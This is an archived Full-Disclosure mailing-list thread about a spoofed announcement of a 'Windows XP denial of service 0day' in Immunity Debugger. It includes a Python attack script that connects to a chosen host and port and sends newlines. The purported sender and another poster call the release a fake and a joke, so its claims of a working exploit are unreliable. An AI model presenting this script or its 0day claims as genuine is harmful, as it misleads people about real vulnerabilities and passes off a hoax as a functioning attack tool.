Date: Tue, 17 Apr 2012 12:36:33 -0400
From: Terrence <secretpackets@...il.com>
To: adam@...osecinstitute.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in CTF exercise

This is awesome! It's almost as awesome as a privilege escalation from root
to root that works only in backtrack.

--
tuna
65617420646120706f6f20706f6f

On Tue, Apr 17, 2012 at 10:07, <adam@...osecinstitute.com> wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.
>
>> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>>> Immunity Debugger Remote Denial of Service 0Day Tested against
>>> version 1.76 and 1.80 on Windows XP distributions
>>>
>>> Has not been tested for potential privilege escalation vectors.
>>>
>>> We first wrote about Immunity Debugger here:
>>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>>
>>> Discovered by a student that wishes to remain anonymous in the
>>> course CTF. This 0day exploit for Windows was discovered by a
>>> student in the InfoSec Institute Ethical Hacking class, during an
>>> evening CTF exercise. The student wishes to remain anonymous, he
>>> has contributed a python version of the 0day. A patch that can be
>>> applied to Windows has not been made available. You can find a
>>> python version of the exploit to copy and paste here:
>>>
>>> #!/usr/bin/python
>>> #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
>>> #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>>
>>> import sys
>>> import os
>>> import time
>>> import getopt
>>> import socket
>>>
>>> class Error(Exception):
>>>     def __init__(self, error):
>>>         self.errorStr=error
>>>     def __str__(self):
>>>         return repr(self.errorStr)
>>>
>>> class Exploit():
>>>
>>>     def __init__(self, targetHost, targetPort):
>>>         self.targetHost = targetHost
>>>
>>>     def exploit(self, targetHost, targetPort):
>>>
>>>         try:
>>>             socket.inet_aton(targetHost)
>>>             s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>>>             s.connect((targetHost,targetPort))
>>>         except socket.error:
>>>             raise Error("Unable to exploit (Connect failed.)")
>>>             sys.exit(0)
>>>
>>>         # exploit
>>>         try:
>>>             s.sendto("\n\n\n", (targetHost, targetPort))
>>>         except:
>>>             raise Error("Unable to exploit (Exploit failed.)")
>>>
>>> def usage():
>>>     print "[!] Usage:"
>>>     print " ( -h, --help ):"
>>>     print " Print this message."
>>>     print " ( --targetHost= ): Target host."
>>>     print " --targetHost=127.0.0.1"
>>>     print " ( --targetPort= ): Target port."
>>>     print " --targetPort=8888"
>>>
>>> def main():
>>>     print "[$] Windows XP 0Day"
>>>     try:
>>>         opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="])
>>>     except getopt.GetoptError, err:
>>>         # Print help information and exit:
>>>         print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
>>>         usage()
>>>         sys.exit(0)
>>>
>>>     targetHost=None
>>>     targetPort=None
>>>     for opt, arg in opts:
>>>         if opt in ("-h", "--help"):
>>>             usage()
>>>             sys.exit(0)
>>>         elif opt =="--targetHost":
>>>             targetHost=arg
>>>         elif opt =="--targetPort":
>>>             targetPort=arg
>>>         else:
>>>             # I would be assuming to say we'll never get here.
>>>             print "[!] Parameter error."
>>>             usage()
>>>             sys.exit(0)
>>>     if not targetHost:
>>>         print "[!] Parameter error: targetHost not set."
>>>         usage()
>>>         sys.exit(0)
>>>
>>>     if not targetPort:
>>>         print "[!] Parameter error: targetPort not set."
>>>         usage()
>>>         sys.exit(0)
>>>
>>>     exploit = Exploit(targetHost, targetPort)
>>>
>>>     print "[*] Attempting to exploit:"
>>>     try:
>>>         exploit.exploit(targetHost, int(targetPort))
>>>     except Error as error:
>>>         print "[!] Exploit Error: %s" % (error.errorStr)
>>>         exit(0)
>>>     print "[*] Exploit appears to have worked."
>>>
>>> # Standard boilerplate to call the main() function to begin
>>> # the program.
>>> if __name__=='__main__':
>>>     main()
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/